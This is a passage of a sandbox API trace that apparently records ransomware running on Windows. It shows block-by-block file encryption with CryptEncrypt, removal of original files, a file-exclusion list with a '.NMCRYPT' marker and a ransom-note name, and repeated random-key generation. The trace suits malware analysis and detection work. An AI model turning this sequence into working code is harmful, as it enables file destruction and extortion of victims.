lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.687] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.687] GetLastError () returned 0x0 [0165.687] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.687] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.687] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.687] GetLastError () returned 0x0 [0165.687] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.687] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.687] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.687] GetLastError () returned 0x0 [0165.687] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.687] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.687] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.687] GetLastError () returned 0x0 [0165.687] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.687] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.687] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.687] GetLastError () returned 0x0 [0165.687] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.687] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.688] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.688] GetLastError () returned 0x0 [0165.688] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.688] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.688] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.688] GetLastError () returned 0x0 [0165.688] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.688] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.688] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.688] GetLastError () returned 0x0 [0165.688] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.688] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.688] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.688] GetLastError () returned 0x0 [0165.688] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.688] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.688] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.688] GetLastError () returned 0x0 [0165.688] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.688] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.688] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.688] GetLastError () returned 0x0 [0165.688] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.688] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.689] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf") returned 1 [0165.689] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shorthand.emf")) returned 0 [0165.690] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf" [0165.690] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0165.690] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFAB3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfab3.tmp")) returned 0xfab3 [0165.690] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shorthand.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFAB3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfab3.tmp"), dwFlags=0x1) returned 0 [0165.690] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFAB3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfab3.tmp")) returned 1 [0165.691] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0165.691] wcslen (_String="OK") returned 0x2 [0165.691] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.691] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.691] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0165.691] CryptDestroyHash (hHash=0x9ad138) returned 1 [0165.691] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*NMCRYPT") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*Recovers your files.html") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*.exe") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*.dll") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*.lnk") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*.bat") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*.ini") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*.msi") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*.scf") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*pagefile.sys*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*AppData*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*\\winrar\\*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*\\java\\*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*\\windows\\*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*\\ESET\\*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*\\AVG\\*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*Atheros*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*Realtek*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*bootmgr*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*boot*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*boot*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*IO.SYS*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*ntldr*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*chrome*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*opera*") returned 0 [0165.691] PathMatchSpecW (pszFile="Small_News.jpg", pszSpec="*firefox*") returned 0 [0165.692] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg", pszSpec="*") returned 1 [0165.692] strlen (_Str="NMoreira") returned 0x8 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.692] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.693] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 